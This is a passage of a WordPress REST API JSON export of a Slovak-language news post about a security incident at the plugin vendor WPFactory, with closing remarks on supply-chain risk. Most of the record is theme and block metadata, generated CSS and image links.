st\u00e1le existova\u0165 \u010fal\u0161ie neakt\u00edvne n\u00e1kladi.<\/li>\n<\/ul>\n\n\n\n<p>Pok\u00fdm sa tieto ot\u00e1zky \u00faplne nevyrie\u0161ia, opatrnos\u0165 zost\u00e1va nevyhnutn\u00e1.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Bud\u00facnos\u0165 zabezpe\u010denia WordPressu<\/h2>\n\n\n\n<p>Incident WPFactory sa m\u00f4\u017ee nakoniec sta\u0165 \u010fal\u0161\u00edm typick\u00fdm pr\u00edkladom v\u00fdziev v oblasti kyberbezpe\u010dnosti, ktor\u00fdm \u010del\u00ed ekosyst\u00e9m otvoren\u00e9ho softv\u00e9ru na webe.<\/p>\n\n\n\n<p>WordPress poh\u00e1\u0148a obrovsk\u00fa \u010das\u0165 glob\u00e1lnej internetovej ekonomiky. Ak\u00e9ko\u013evek rozsiahle ohrozenie ovplyv\u0148uj\u00face v\u00fdvoj\u00e1rov pluginov m\u00f4\u017ee ma\u0165 preto d\u00f4sledky presahuj\u00face r\u00e1mec jednotliv\u00fdch webov\u00fdch str\u00e1nok.<\/p>\n\n\n\n<p>Ke\u010f\u017ee \u00fato\u010dn\u00edci sa st\u00e1le viac zameriavaj\u00fa na kompromit\u00e1ciu dod\u00e1vate\u013esk\u00e9ho re\u0165azca a techniky skrytej perzistencie, bezpe\u010dnos\u0165 doplnkov u\u017e nemo\u017eno pova\u017eova\u0165 za druhorad\u00fa z\u00e1le\u017eitos\u0165. V spolo\u010dnosti Ferber Enterprises sme presved\u010den\u00ed, \u017ee t\u00e1to udalos\u0165 je d\u00f4le\u017eit\u00fdm pripomenut\u00edm toho, \u017ee kyberbezpe\u010dnos\u0165 sa net\u00fdka len samotnej ochrany webov\u00fdch str\u00e1nok, ale aj zabezpe\u010denia ka\u017edej vrstvy re\u0165azca distrib\u00facie softv\u00e9ru.<\/p>\n\n\n\n<p>D\u00f4vera v otvoren\u00e9 ekosyst\u00e9my z\u00e1vis\u00ed od transparentnosti, r\u00fdchlej reakcie na incidenty a siln\u00fdch postupov opera\u010dnej bezpe\u010dnosti. Ekosyst\u00e9m WordPress teraz \u010del\u00ed d\u00f4le\u017eit\u00e9mu momentu.<\/p>\n\n\n\n<p>Sp\u00f4sob, ak\u00fdm v\u00fdvoj\u00e1ri, spr\u00e1vcovia repozit\u00e1rov, poskytovatelia hostingu a bezpe\u010dnostn\u00e9 t\u00edmy zareaguj\u00fa na incidenty, ako je tento, pom\u00f4\u017ee ur\u010di\u0165, \u010di si WordPress m\u00f4\u017ee aj na\u010falej udr\u017ea\u0165 d\u00f4veru mili\u00f3nov firiem a organiz\u00e1ci\u00ed, ktor\u00e9 sa na\u0148 denne spoliehaj\u00fa.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/sk\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}